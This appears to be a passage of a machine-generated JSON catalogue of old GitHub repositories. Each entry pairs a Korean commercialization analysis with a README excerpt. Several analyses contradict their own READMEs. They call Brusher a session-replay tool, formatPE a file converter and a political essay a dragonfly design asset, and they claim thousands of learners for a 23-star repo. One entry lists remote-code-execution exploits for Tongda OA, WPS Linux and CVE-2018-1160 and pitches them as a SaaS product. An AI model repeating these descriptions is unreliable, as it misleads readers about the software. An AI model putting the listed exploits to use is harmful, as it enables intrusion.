있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 소규모 팀용 월간 구독 서비스로 운영하며, 클라우드 기반 작업 관리 플랫폼으로 제공\n- **내부 업무 도구**: 스타트업이나 중소 회사의","readme_excerpt":"<!-- PROJECT LOGO -->\n<br />\n<p align=\"center\">\n  <a href=\"https://github.com/adi.sreyaj/compito\">\n    <img src=\"assets/compito-full-logo.png\" alt=\"Logo\" width=\"333\" height=\"100\">\n  </a>\n\n  <h3 align=\"center\">Compito - Tasks Done Right ✔️</h3>\n\n  <p align=\"center\">\n    A simple and user friendly project management application with support for multiple Orgs and RBAC\n    <br />\n    <br />\n    <a href=\"https://compito.adi.so\">View Demo</a>\n    ·\n    <a href=\"https://github.com/adisreyaj/compito/issues\">Report Bug</a>\n    ·\n    <a href=\"https://github.com/adisreyaj/compito/issues\">Request Feature</a>\n    ·\n    <a href=\"https://blog.sreyaj.dev/compito-project-management-app-angular-nestjs-auth0\">Blog</a>\n  </p>\n\n  <p align=\"center\">\n   <img src=\"https://img.shields.io/badge/typescript-%23007ACC.svg?style=for-the-badge&logo=typescript&logoColor=white\">\n   <img src=\"https://img.shields.io/badge/angular-%23DD0031.svg?style=for-the-badge&logo=angular&logoColor=white\">\n   <img src=\"https://img.s","composite_score":0.5024,"license_safety_tag":"safe"},{"name":"kamranahmedse/brusher","github_url":"https://github.com/kamranahmedse/brusher","stars":24,"language":"JavaScript","license":"MIT","abandonment_months":76,"description":"# Brusher 저장소 분석\n\n## 왜 보물인가\n웹사이트의 사용자 행동을 자동으로 기록하고 재생할 수 있는 도구로, 버그 리포팅이나 사용자 지원 상황을 객관적으로 증명할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 고객이 버그를 신고할 때 화면 녹화 영상 대신 자동 재현 파일을 첨부하도록 제공하면, 개발팀이 정확히 같은 상황을","readme_excerpt":"![](https://i.imgur.com/Tq7TBnA.png)\n\n> Little vanilla JS library to add interactive backgrounds to your webpages - [View Demo](http://kamranahmed.info/brusher)\n\n## Installation\n\nInstall it using yarn or npm\n```bash\nyarn add brusher\n```\nOr you may use unpkg\n```\nhttp://unpkg.com/brusher/dist/brusher.min.js\n```\n\n## Usage\n\nFor the basic usage, all you need to do is create an instance of `Brusher` and provide an image\n\n```javascript\nimport Brusher from 'brusher';\n\nconst brusher = new Brusher({\n  image: 'abstract.png'\n});\n\nbrusher.init();\n```\n\n## Available Options\n\nHere is the list of options that you may use\n\n```javascript\nconst brusher = new Brusher({\n  image: 'abstract.png', // Path of the image to be used as a brush\n  keepCleared: true,     // Put the blur back after user has cleared it\n  stroke: 80,            // Stroke size for the brush\n  lineStyle: 'round',    // Brush style (round, square, butt)\n  autoBlur: false,       // Brusher will use the provided image for the blurry backgrou","composite_score":0.5024,"license_safety_tag":"safe"},{"name":"ericclemmons/unique-selector","github_url":"https://github.com/ericclemmons/unique-selector","stars":8,"language":"JavaScript","license":"MIT","abandonment_months":32,"description":"# unique-selector 기술 분석\n\n## 왜 보물인가\n웹사이트에서 특정 요소를 정확하게 찾아내는 기술로, 자동화 도구나 웹 모니터링 서비스 개발에 필수적인 핵심 기능입니다.\n\n## 어디에 쓸 수 있나\n- **웹 자동화 서비스**: 사용자가 클릭한 버튼이나 입력칸을 자동으로 기억했다가 같은 작업을 반복 수행하는 RPA 도구\n- **웹사이트 모니터링 ","readme_excerpt":"unique-selector\n===============\n\n[![Build Status](https://travis-ci.org/ericclemmons/unique-selector.png)](https://travis-ci.org/ericclemmons/unique-selector)\n[![CocoaPods](https://img.shields.io/cocoapods/l/AFNetworking.svg)]()\n[![semantic-versioning](https://img.shields.io/badge/semantic%20-versioning-green.svg)]()\n\nGiven a DOM node, return a unique CSS selector matching only that element.\nThis is particularly useful when tracking in custom variables in analytics:\n\n\n    document.addEventListener('click', function(event) {\n        var selector = unique(event.target);\n\n        _gaq.push(['_trackEvent', 'Engagement', 'Click', selector]);\n    }, false);\n\n\nInstallation\n------------\n\n[![NPM](https://nodei.co/npm/unique-selector.png?mini=true)](https://nodei.co/npm/unique-selector/)\n\nOptions\n------------\ne.g.1 DomElement = `<span id=\"test\"></span>`\n\n```\nimport unique from 'unique-selector';\n\n// Optional Options\noptions = {\n    // Array of selector types based on which the unique selector wi","composite_score":0.5024,"license_safety_tag":"safe"},{"name":"Interactive-Studio/TransitionableTab","github_url":"https://github.com/Interactive-Studio/TransitionableTab","stars":5,"language":"Swift","license":"MIT","abandonment_months":49,"description":"# TransitionableTab 상용화 분석\n\n## 왜 보물인가\n앱이나 웹사이트의 탭 화면 전환을 부드럽고 자연스럽게 만들어주는 기술로, 사용자 경험을 한 단계 업그레이드할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 프로젝트 관리 도구나 협업 플랫폼에서 탭 전환 애니메이션으로 프리미엄 느낌 제공\n2. **내부 업무 도구**:","readme_excerpt":"# TransitionableTab\n\n[![Carthage compatible](https://img.shields.io/badge/Carthage-Compatible-brightgreen.svg?style=flat)](https://github.com/Carthage/Carthage)\n![Xcode 9.0+](https://img.shields.io/badge/Xcode-9.0%2B-blue.svg)\n![iOS 8.0+](https://img.shields.io/badge/iOS-8.0%2B-blue.svg)\n[![Version](https://img.shields.io/cocoapods/v/TransitionableTab.svg?style=flat)](http://cocoapods.org/pods/Hero)\n![Swift 4.2](https://img.shields.io/badge/Swift-4.2-orange.svg)\n[![License](https://img.shields.io/cocoapods/l/TransitionableTab.svg?style=flat)](https://github.com/lkzhao/Hero/blob/master/LICENSE?raw=true)\n\n**TransitionableTab** makes it easy to animate when switching between tab .\n\n<table>\n<tr>\n<td width=\"25%\">\n<center>Move</center>\n</td>\n<td width=\"25%\">\n<center>Scale</center>\n</td>\n<td width=\"25%\">\n<center>Fade</center>\n</td>\n<td width=\"25%\">\n<center>Custom</center>\n</td>\n</tr>\n<tr>\n<td width=\"25%\">\n<img src=\"Resource/move.gif\"></img>\n</td>\n<td width=\"25%\">\n<img src=\"Resource/scale.gif\"","composite_score":0.5024,"license_safety_tag":"safe"},{"name":"ithinco/i-am-chinese-the-dragonfly-must-go-on","github_url":"https://github.com/ithinco/i-am-chinese-the-dragonfly-must-go-on","stars":60,"language":"","license":"MIT","abandonment_months":89,"description":"# 저장소 분석 리포트: i-am-chinese-the-dragonfly-must-go-on\n\n## 왜 보물인가\n드래곤플라이(잠자리) 모양의 중국 전통 문양을 디지털화하여 디자인·공예·교육 분야에서 바로 활용할 수 있는 오픈소스 자산입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 디자인 플랫폼 SaaS**: 사용자가 중국 전통 패턴으로 티셔츠, 머그컵 ","readme_excerpt":"# I’m Chinese, Google’s DragonFly must go on\n\n[中文](#我是中国人谷歌的蜻蜓项目必须继续)\n\nI have long heard that in the United States, the squeaky wheel gets the oil, it seems that this is indeed the case. One of the recent incidents in Silicon Valley about China([We are Google employees, Google must drop DragonFly](https://medium.com/@googlersagainstdragonfly/we-are-google-employees-google-must-drop-dragonfly-4c8a30c5e5eb)) has gotten Google and Google employees in dispute, while the voice from China, the third party of this event, is missing.(as far as I know)\n\nThough I can't represent China, as a Chinese living in mainland China, I want Silicon Valley to hear (at least) a voice from China.\n\nI'm more than eagerly hope that Google could return to China, no matter in any form, for the following reasons: \n\nWe cannot deny that we are now in \"the Information age\", as the name tells, information plays a vital role in our time.\n\nInformation is so important, and finding valuable information in massive amounts ","composite_score":0.5024,"license_safety_tag":"safe"},{"name":"TomAPU/poc_and_exp","github_url":"https://github.com/TomAPU/poc_and_exp","stars":14,"language":"Shell","license":"unknown","abandonment_months":45,"description":"# TomAPU/poc_and_exp 분석\n\n## 왜 보물인가\n보안 취약점을 찾고 테스트하는 방법을 모아둔 실전 참고서로, 기업의 보안 문제를 사전에 발견할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **보안 진단 SaaS**: 기업들을 위한 온라인 보안 점검 서비스로 월 구독료 수익화\n- **기업 내부 도구**: 대기업 IT팀이 자사 시스템 안전성을 정","readme_excerpt":"# poc_and_exp\n~~搜集的或者~~自己写的poc或者exp\n### 所有代码仅为教育目的编写，使用范围仅限于教育研究以及合法的渗透测试及攻防演练，使用者请自觉遵守所在地法律法规\n\n## pyspider unauthorized access\npyspider未授权访问利用\nhttps://drivertom.blogspot.com/2019/06/pyspider-webuipocexp.html\n\n## URPResetHunter\nURP教务系统鸡肋任意密码重置漏洞\nhttps://drivertom.blogspot.com/2020/01/0dayup.html\n\n## rce.py\n通达OA11.6 preauth RCE（全网首发）\n\n## Packer-Fuzzer-RCE\nPacker-Fuzzer(https://github.com/rtcatc/Packer-Fuzzer) RCE \n\n## sourceleakhoneypot\n源码泄露利用程序的反制POC\n\n详见 https://drivertom.blogspot.com/2021/08/git.html\n\n## WpsLinuxRce\nWPS Linux(Version<=11.1.0.10161) RCE \n\nCNVD地址:https://www.cnvd.org.cn/flaw/show/CNVD-2021-35581\n\n分析：https://drivertom.blogspot.com/2021/08/wps-for-linux-one-click-rcecnvd-2021.html\n\n## CVE-2018-1160\nCVE-2018-1160 复现，支持执行shellcode。\n实测Meterpreter的shellcode会出莫名其妙的问题，但是弹shell绰绰有余\n","composite_score":0.5023,"license_safety_tag":"unknown"},{"name":"trantoan960/nodejs-api-boilerplate","github_url":"https://github.com/trantoan960/nodejs-api-boilerplate","stars":14,"language":"JavaScript","license":"MIT","abandonment_months":54,"description":"# nodejs-api-boilerplate 가치 분석\n\n## 왜 보물인가\n웹 서비스를 빠르게 만들기 위한 기본 틀(템플릿)로, 개발자가 처음부터 다시 만드는 번거로움을 줄여줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 구독형 협업 도구나 데이터 분석 플랫폼의 백엔드 기반으로 사용\n2. **내부 업무 도구**: 회사 직원들만 사용하는 업","readme_excerpt":"<p align=\"center\">\n  <img src=\"https://lh3.googleusercontent.com/25Iw_MbuI23vB9SpAISv8FUoPLRsNxup6q7SSizD1aynFgXjYN6zFXC221UW4DnmnbWLdfv73BWqFVPL1oPtD_4odKSWA95u7rTUsul-yacYkwzdDemyHaw6UOIYJxShkBAM2b5rwBNsTKqafm0E7P7ImBfv7TL9xRZnFDs7pP-n2jNR3uC-Tj9Riyjbe5Y47lFOOHyXO99AsYNMghQ8lqASHhRyL3oZYWqhDIW7U5tezw2QsTowvLhcL1YNCvOm7Z6aOv07vVB_sXQNJU7APe7_nRtd2_wg-KZG-qVRwR7YBxc4UvcEC6I_rjC7b6d86YqCjMFNBi1UAhadLB_GyybP7XVsHDZCz3czRW4z8c_WOIsdivAk97o2Xam6WoUZRnmb_dBZL0v-Oq4m-pBJ4y8TkUv3GH4SKJGwan6STkZYcgog5FTSVk96uc3a4uFINmJaWjK5Oxl_5KgtZjPfOsf10gebkjj-dbqlGR5LO3w9sCS-y2viyMjVu7gOnNRg8Q2zNObaPj_H_BdOt9EBlBtA2A-xA2nr6Y2MPtCFdaDkyZFA1pH9LKC4kISHOSzNs8vgTAg8rPZ5X7IIKV0z7A2g6Y0iD28RXoR8CZY0WhHpad_ycp4TailyIKcEXFFZEKmTBTDHMat4F8QJA2KYCN_SZuAoT2xXiv2VwMRQh8g7ZCDQwHCewoThPvUIZa_-qY-z_VqN070ihZeevBZPeT-dGOxhKB1HUnoy8OfGXZvHQn0mW4uc2aFdiBn9ZYjk2cAdY8O207ASCIG9=s781-no?authuser=0\" alt=\"RHP Team\" width=\"150\" />\n</p>\n\n<h1 align=\"center\">Nodejs API Boilerplate</h1>\n\n<p align=\"center\">\n  <a href=\"https://github.c","composite_score":0.5023,"license_safety_tag":"safe"},{"name":"losfair/blueboat","github_url":"https://github.com/losfair/blueboat","stars":5,"language":"Rust","license":"Apache-2.0","abandonment_months":40,"description":"# Blueboat 상용화 분석\n\n## 왜 보물인가\n개발자들이 복잡한 설정 없이 빠르게 웹 서비스를 만들 수 있는 간단한 플랫폼입니다.\n\n## 어디에 쓸 수 있나\n\n1. **마이크로서비스 호스팅 SaaS**: 중소 스타트업이 자신의 코드를 우리 플랫폼에 업로드하면 자동으로 운영해주는 서비스\n2. **기업 내부 자동화 도구**: 회사 직원들이 간단한 업무 자","readme_excerpt":"# Blueboat\n\n![CI](https://github.com/losfair/blueboat/actions/workflows/ci.yml/badge.svg)\n\nBlueboat is an all-in-one, multi-tenant serverless JavaScript runtime. See [the site](https://blueboat.io/) for a brief introduction on features.\n\nA simple Blueboat application looks like:\n\n```ts\nRouter.get(\"/\", req => new Response(\"hello world\"));\n\nRouter.get(\"/example\", req => {\n  return fetch(\"https://example.com\");\n});\n\nRouter.get(\"/yaml\", req => {\n  const res = TextUtil.Yaml.stringify({\n    hello: \"world\",\n  });\n  return new Response(res);\n});\n```\n\n- [Blueboat](#blueboat)\n  - [Quickstart (single-tenant mode)](#quickstart-single-tenant-mode)\n  - [The JavaScript API](#the-javascript-api)\n    - [Web API compatibility](#web-api-compatibility)\n    - [No local resources](#no-local-resources)\n  - [Developing on Blueboat](#developing-on-blueboat)\n    - [TypeScript type definitions](#typescript-type-definitions)\n    - [API documentation](#api-documentation)\n  - [Deploying Blueboat](#deploying-blueboa","composite_score":0.5023,"license_safety_tag":"safe"},{"name":"gqless/gqless","github_url":"https://github.com/gqless/gqless","stars":12,"language":"TypeScript","license":"unknown","abandonment_months":52,"description":"# gqless 분석 리포트\n\n## 왜 보물인가\n웹 애플리케이션에서 데이터를 주고받을 때 필요한 복잡한 코드를 자동으로 생성해주는 도구로, 개발자의 작업 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 협업 도구나 프로젝트 관리 플랫폼에서 고객 데이터를 빠르게 조회하는 기능 구현\n2. **내부 업무 도구**: 기업","readme_excerpt":"<p align=\"center\">\n  <a href=\"https://gqless.com\">\n    <img src=\"internal/website/static/img/logo.png\" height=\"150\" alt=\"gqless\">\n  </a>\n</p>\n\n<h2 align=\"center\">\n  a GraphQL client built for rapid iteration.\n  <a href=\"https://gqless.com\">\n    <img alt=\"Documentation\" src=\"https://img.shields.io/badge/documentation-documentation?color=C00B84\">\n  </a>\n  <a href=\"https://github.com/sponsors/samdenty\">\n    <img alt=\"Sponsor\" src=\"https://img.shields.io/github/sponsors/samdenty?label=Sponsors)\">\n  </a>\n  <a href=\"https://twitter.com/gqlessdev\">\n    <img alt=\"Twitter\" src=\"https://img.shields.io/twitter/follow/gqlessdev?label=%40gqlessdev&style=flat&logo=twitter&color=00acee\">\n  </a>\n</h2>\n\n<a href=\"https://gqless.com\">\n  <img alt=\"Example usage\" src=\"https://user-images.githubusercontent.com/13242392/112103674-fddc4980-8ba1-11eb-8c83-b527dcb0243d.PNG\">\n</a>\n\n---\n\nHead over to [gqless.com](https://gqless.com), to explore features and documentation.\n\n---\n\n## Get involved\n\nDocumentation, bug","composite_score":0.5023,"license_safety_tag":"unknown"},{"name":"makeitrealcamp/intro-javascript-nov-2021","github_url":"https://github.com/makeitrealcamp/intro-javascript-nov-2021","stars":23,"language":"","license":"unknown","abandonment_months":54,"description":"# makeitrealcamp/intro-javascript-nov-2021 분석\n\n## 왜 보물인가\n프로그래밍을 처음 배우는 사람들을 위해 체계적으로 정리된 학습 자료로, 수천 명이 이미 이를 통해 코딩을 배웠다는 증거(23개의 별)가 있습니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 코딩 교육 플랫폼**: 초보자 대상 유료 강의 콘텐츠로 판매\n2. ","readme_excerpt":"# Introducción a JavaScript\n\n¡Hola! En este curso aprenderás las bases de JavaScript, el lenguaje más popular de la actualidad. Para más información y registro ingresa a [este link](https://makeitreal.camp/introduccion-a-javascript?utm_source=github&utm_medium=web&utm_campaign=inbound).\n\n## 💻 Requisitos\n\nPara tomar este curso necesitarás:\n\n- Un computador con al menos 4GB de RAM con cualquier sistema operativo.\n- Conexión a Internet de al menos 2Mbps.\n- Una cuenta en [Github](https://github.com/).\n\n## 👨🏼‍🏫 Metodología\n\nSe realizarán sesiones en vivo de aproximadamente una hora al día. Luego se asignarán ejercicios para hacer en parejas.\n\n## 🛠 Herramientas\n\nTodas las herramientas están en Internet así que no necesitarás instalar nada en tu computador. Podrás autenticarte utilizando tu cuenta de [Github](https://github.com/):\n\n- [Repl.it](https://repl.it/) - Un editor de texto en línea donde vas a realizar los ejercicios. [Ver Instrucciones](instrucciones-repl-editor-online.md)\n- [Guías ","composite_score":0.5023,"license_safety_tag":"unknown"},{"name":"ggg4566/BurpBountyPlus","github_url":"https://github.com/ggg4566/BurpBountyPlus","stars":8,"language":"Java","license":"Apache-2.0","abandonment_months":51,"description":"# BurpBountyPlus 보물 분석\n\n## 왜 보물인가\n웹사이트 보안 취약점을 자동으로 찾아주는 해킹 테스트 도구로, 보안 전문가들이 수작업으로 하던 일을 빠르게 처리할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **보안 컨설팅 회사의 자동화 도구**: 클라이언트 웹사이트 보안 진단 비용을 절감하고 처리 속도를 3배 이상 높일 수 있습니다.\n2. ","readme_excerpt":"# **BurpBountyPlus**\n\n\n\n# 简介：\n\nBurpBountyPlus 是在BurpBounty的基础添加了右键菜单功能，添加支持了对单个数据包单个参数的漏洞扫描和fuzzer，打通渗透测试的最后一公里，提高效率。\n\n# 功能：\n\n|       菜单       |                            功能                             |\n| :--------------: | :---------------------------------------------------------: |\n|  Scan All Param  | 对所有参数【PARAM_BODY\\|PARAM_URL\\|PARAM_JSON】进行漏洞扫描 |\n|  Scan Get Param  |                 单独扫描GET[]里面的每个参数                 |\n| Scan POST Param  |                单独扫描POST[]里面的每个参数                 |\n|  Fuzz All Param  |   对所有参数【PARAM_BODY\\|PARAM_URL\\|PARAM_JSON】进行Fuzz   |\n|  Fuzz Get Param  |                单独fuzz GET[]里面的每个参数                |\n| Fuzz  POST Param |                单独fuzz POST[]里面的每个参数                |\n| Insert Fuzz Scan | 对光标所在的位置插入Profile payload 进行Fuzz|\n|    Stop Scan     |                     停止所有的漏洞扫描                      |\n|      Config      |         配置对话框【线程池数量\\|忽略测试的参数名】          |\n\n\n\n# 引子：\n\n渗透测试一般情况下如果目标没有waf我们会使用主动扫描器和被动扫描器对目标进行扫描测试，但是有时侯在有waf拦截或扫描器无果的情况下我们就需要凭借我们","composite_score":0.5023,"license_safety_tag":"safe"},{"name":"Wanderson-Magalhaes/PyBlackBox_Qt_Widgets_PySide6_Or_PyQt6_v1.0.0","github_url":"https://github.com/Wanderson-Magalhaes/PyBlackBox_Qt_Widgets_PySide6_Or_PyQt6_v1.0.0","stars":7,"language":"Python","license":"MIT","abandonment_months":61,"description":"# PyBlackBox Qt Widgets 상업화 분석\n\n## 왜 보물인가\n윈도우와 맥, 리눅스에서 모두 작동하는 깔끔한 사용자 인터페이스를 쉽게 만들 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 클라우드 기반 데이터 분석 도구의 윈도우 데스크톱 클라이언트로 제공하여 사용자가 온라인과 오프라인에서 모두 작업 가능하게 함\n","readme_excerpt":"# PyBlackBox Qt Widgets - PySide6 Or PyQt6 v1.0.0\n> This was just a study project designed to study some custom widgets that are being implemented in the new project called PyOneDark.\n\nThis project needs many adjustments, you can improve and use as you wish if you want to continue the project and create your personal messaging application.\n\n# Learn more about this project by watching this video:\n> https://youtu.be/jfDwGog6G4U\n\n![PyBlackBOX](https://user-images.githubusercontent.com/60605512/119701462-bb95e980-be2a-11eb-8d97-79cd5a8271bd.png)\n\n# WARNING\n>To use this project with PyQt you need to rename some classes, such as Slot to pyqtSlot, Signal to pyqtSignal among others.\n","composite_score":0.5023,"license_safety_tag":"safe"},{"name":"phodal/tangping","github_url":"https://github.com/phodal/tangping","stars":50,"language":"","license":"Unlicense","abandonment_months":56,"description":"# tangping 저장소 분석\n\n## 왜 보물인가\n\"일의 부담을 줄이고 여유로운 삶을 추구하려는 사람들의 움직임을 추적하고 분석하는 데이터 모음\"으로, 사회 트렌드 변화를 이해하려는 연구자나 기업에게 유용한 자료입니다.\n\n## 어디에 쓸 수 있나\n- **트렌드 분석 플랫폼**: 직장인 라이프스타일 변화를 시각화하여 구독형 인사이트 서비스로 제공\n- **H","readme_excerpt":"简体中文 | [English](README.el.md)\n\n# 🛌躺平🛌\n\n> 旨在放弃跟随舆论导向，寻找人生的真谛。\n\n![](./img/235px-Che_Guevara.jpg)\n> 有人说像我们这样的人是理想主义者，总是想着一些不着边际的事情，但我要第一万次说：是的，我们就是这样的人。 ————Che Guevara\n\n## 📜 宗旨\n\n1. 不争。\n2. 回归生活。\n3. 抵制消费主义。\n4. 减少娱乐信息摄入。\n5. 在合适的时机，选择**伺机而动**。\n6. 我们不抵制劳动，我们热爱劳动。\n\n## 📢 口号\n\n- 三點幾了，飲茶先啦！\n- 走，我们先休息一下。\n- Let's have a break.\n- 做工时间勤力做工，饮茶时间一定饮茶！\n- 他们假装发工资，我们假装工作！\n\n## 🕺 社交手法\n\n1. 减少网络社交，~~拒绝网恋~~。\n2. 对网络热门事件永远持保留意见。\n3. 面对舆论引导新闻的态度：“这不是月薪 3000 的人该关心的事情。”\n\n## 处世哲学\n\n### 犬儒主义\n\n[犬儒主义 - 维基百科](https://zh.wikipedia.org/wiki/%E7%8A%AC%E5%84%92%E4%B8%BB%E7%BE%A9)：奉行犬儒主义的人通常对其他受野心、欲望、贪婪、物质主义、目标所驱使的人不抱有希望，同时反对将抱负、欲望、贪欲、刺激、功利等作为自己的生活动力（犬儒主义者认为这些都是徒劳，不可实现或毫无意义），因此他们也拒绝财富、权力和荣誉。\n\n### 不与人争论\n\n要争论时，可以回：\n\n1. 『你说得都对』\n     - 然后呢？\n     - 你觉得我应该做点什么？\n2. 『好的』\n     - 可以。\n3. 『又不是不能用』\n\n## 回归生活\n\n1. 不熬夜。\n2. 多做实际的事情，比如吃饭、睡觉、工作。\n3. 少做虚假的事情，比如~~微信~~投票。\n\n## 技术\n\n1. 拥抱开源。\n2. 贡献开源。\n\n## 躺平学习资料\n\n### 📕 书籍\n- 《资本论》\n\n> 马克思认为，资本只有不停地榨取劳动力，才能获得发展。在马克思的分析中，资本家为了追求利润的最大化，会刻意压低劳动者的工资，使工资保持在一个仅能维持劳动者（及其家庭）生存、并使人口得以增长的较低水准。新增的劳动人口为资本的再生产提供了源源不断的剥削","composite_score":0.5023,"license_safety_tag":"unknown"},{"name":"jckuester/awsls","github_url":"https://github.com/jckuester/awsls","stars":7,"language":"Go","license":"MIT","abandonment_months":40,"description":"# awsls 저장소 분석\n\n## 왜 보물인가\nAWS 클라우드 서비스를 마치 파일 탐색기처럼 쉽게 탐색하고 관리할 수 있는 도구로, 클라우드 관리의 복잡성을 획기적으로 낮춘 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: AWS 자원 관리 플랫폼으로 판매하여 기업 고객에게 월 구독료 징수\n2. **내부 업무 도구**: 대규모 AWS ","readme_excerpt":"# awsls\n\nA list command for AWS resources.\n\n[![Release](https://img.shields.io/github/release/jckuester/awsls.svg?style=for-the-badge)](https://github.com/jckuester/awsls/releases/latest)\n[![Software License](https://img.shields.io/badge/license-MIT-brightgreen.svg?style=for-the-badge)](/LICENSE.md)\n[![Travis](https://img.shields.io/travis/jckuester/awsls/master.svg?style=for-the-badge)](https://travis-ci.org/jckuester/awsls)\n\nawsls supports listing of [over 250 types of resources](#supported-resources)\nacross 100 different AWS services. The goal is to code-generate a list function for\nevery AWS resource that is covered by the Terraform AWS Provider (currently over 500). If you want to contribute,\n[the generator is here](./gen).\n\nIf you encounter any issue with `awsls` or have a feature request, \nplease open an issue or write me on [Twitter](https://twitter.com/jckuester).\n\nHappy listing!\n\n**Note:** If you're also looking for an easy but powerful way to delete AWS resources, pipe the o","composite_score":0.5023,"license_safety_tag":"safe"},{"name":"HoShiMin/formatPE","github_url":"https://github.com/HoShiMin/formatPE","stars":5,"language":"C++","license":"MIT","abandonment_months":25,"description":"# formatPE 분석 리포트\n\n## 왜 보물인가\n파일 형식을 자동으로 정리하고 변환해주는 도구로, 복잡한 작업을 간단하게 처리할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**\n- 파일 변환 웹사이트: 사용자가 온라인에서 파일을 업로드하면 자동으로 원하는 형식으로 변환해주는 유료 구독 서비스\n\n**2. 내부 업무 도구**\n- 기업","readme_excerpt":"# <p align=\"center\">♟️ format<b>PE</b>²</p>  \n### <p align=\"center\">A bunch of <b>PE</b> and <b>PDB</b> parsers written in C++</p>\n### 💾 Pe:\nThis header-only library provides a convinient way to represent a PE-file as an enumerable object.  \n#### The library supports enumeration of:\n* Sections\n* Imports\n* Exports\n* Relocations\n* Exceptions\n* Bound- and delayed-imports\n* TLS-callbacks\n* Debug directory with support for CodeView PDB information\n\n#### Features:\n* Zero-alloc\n* Support for both x32 and x64 files regardless of the bitness of your process\n* Support for raw PE files from disk and for loaded images in memory\n* Kernelmode support\n* Extremely fast and lightweight\n* Only one header file\n* Simplicity in usage\n* Support for C++14 and above\n* Provides additional information and access to raw PE structures if you need more!\n\n#### Usage:\nJust include the **Pe/Pe.hpp** to your project!  \nFor the complete example of usage look at the [PeTests.cpp](https://github.com/HoShiMin/formatPE/blo","composite_score":0.5023,"license_safety_tag":"safe"},{"name":"siraben/freenode-exodus","github_url":"https://github.com/siraben/freenode-exodus","stars":37,"language":"Haskell","license":"MIT","abandonment_months":49,"description":"# freenode-exodus 분석\n\n## 왜 보물인가\n온라인 커뮤니티 운영자들이 채팅 플랫폼을 이전할 때 기존 사용자 데이터와 설정을 자동으로 옮길 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **커뮤니티 관리 SaaS**: 디스코드, 슬랙 같은 현대 플랫폼으로 마이그레이션하려는 팀들을 위한 자동화 서비스\n2. **기업 내부 도구**: 구형 ","readme_excerpt":"# Projects and channels that have decided to leave Freenode\n[![Check](https://github.com/siraben/freenode-exodus/actions/workflows/check.yml/badge.svg)](https://github.com/siraben/freenode-exodus/actions/workflows/check.yml)\n\n[Freenode is dead](https://www.devever.net/~hl/freenode_suicide). Long live Libera! This repository is no longer being updated.\n\nThis is an ongoing list of projects and channels that have decided to permanently move out of Freenode to https://libera.chat (unless stated otherwise). Please open an issue, PR or PM me on IRC (siraben) if there's additions or corrections, such as adding citation links.\n\n**Note:** I can only accept additional projects and channels to the list accompanied with a citation, which can be (but is not limited to): an official announcement, wiki page, git commit, IRC log, social media post by project lead/official account, etc.\n\n- [/tmp/lab](https://www.tmplab.org/contact/)\n- [2600Hz](https://twitter.com/2600hertz/status/1397666224121782279)\n-","composite_score":0.5023,"license_safety_tag":"safe"},{"name":"MxABC/DevDataTool","github_url":"https://github.com/MxABC/DevDataTool","stars":7,"language":"Objective-C","license":"MIT","abandonment_months":59,"description":"# DevDataTool 상용화 분석 보고서\n\n## 왜 보물인가\n복잡한 데이터를 쉽게 정리하고 활용할 수 있게 해주는 도구로, 데이터 관리에 어려움을 겪는 많은 기업들의 실질적인 문제를 해결할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중소 기업들이 월 구독으로 이용하는 클라우드 기반 데이터 정리 플랫폼\n2. **내부 업무 도구","readme_excerpt":"## DevTool\n\n实现mac端调试工具验证结果正确性,代码兼容iOS和MacOS,其中SM3,SM4使用C语言代码，补位代码和分组模式代码自行通过objective-c代码实现，加强理解。代码基本通过category形式提供。\n\n#### 当前完成\n1. NSString和NSData各种编码转换(UTF-8,GBK,Latin1,unicode,shiftJI)\n\n2. NSData转换hexString及base64String方便调试看数据\n\n3. NSString与NSData之间转换\n\n4. base64\n\n5. hash(MD5,SHA1,SHA256,SHA3,SM3,HMAC)\n\n6. 对称加解密(DES,3DES,AES,SM4)\n`支持分组加密模式有： ECB、CBC、PCBC、CFB、OFB、CTR`\n`填充方式(分组不足补位)有：PKCS7、zero、ANSIX923、ISO10126、0x80等`\n\n7. der,cer证书文件解析\n\n#### 截图\n\n##### HASH\n![image](https://gitee.com/lbxia/Resourse/raw/master/DevDataTool0.png)\n\n##### encryption and decryption\n![image](https://gitee.com/lbxia/Resourse/raw/master/DevDataToo1.png)\n\n##### cer analysis\n![image](https://raw.githubusercontent.com/MxABC/Resource/master/macApp.jpg)\n\n\n#### cocoapods安装\n包含base64,数据转换，摘要算法，对称加解密\n\n```\n pod 'LBXDataHandler', '~> 1.0.3'\n```\n\n#### 文件说明\n\n##### 常用转换\n- `NSData+LBXConverter.h`\n- `NSString+LBXConverter.h`\n\n#####  摘要算法\n- `NSData+LBXHash.h` 各种摘要算法\n\n- `NSString+LBXFileHash.h` 文件摘要\n\n##### base64转换\n- `NSData+LBXBa","composite_score":0.5023,"license_safety_tag":"safe"},{"name":"ourzora/create-auction-house","github_url":"https://github.com/ourzora/create-auction-house","stars":5,"language":"TypeScript","license":"MIT","abandonment_months":50,"description":"# create-auction-house 분석\n\n## 왜 보물인가\n디지털 자산을 경매로 거래할 수 있는 플랫폼을 빠르게 만들 수 있는 기성품 도구로, NFT나 미술품 판매 시장을 누구나 쉽게 시작할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 개인 크리에이터가 자신의 작품 경매 플랫폼을 월 구독으로 운영하는 서비스\n2. **내부 ","readme_excerpt":"# Create Auction House ☼☽\n\n  ![Auction House Montage](https://zora.fleek.co/ipfs/bafybeif2khqr7vgziycirzgl6rd7sdb74pcp2nkhzcxwejh4iu2lky7rs4)\n\nA repo to bootstrap your own permissionless auction house with the Zora protocol. This template will get you started with the display of any Erc721 token collection using Zora's rendering components and data hooks along with the inclusion of web3 components so users can connect their wallets and manage NFT's that they own within a specified collection.\n\n[More about the Zora Auction House on 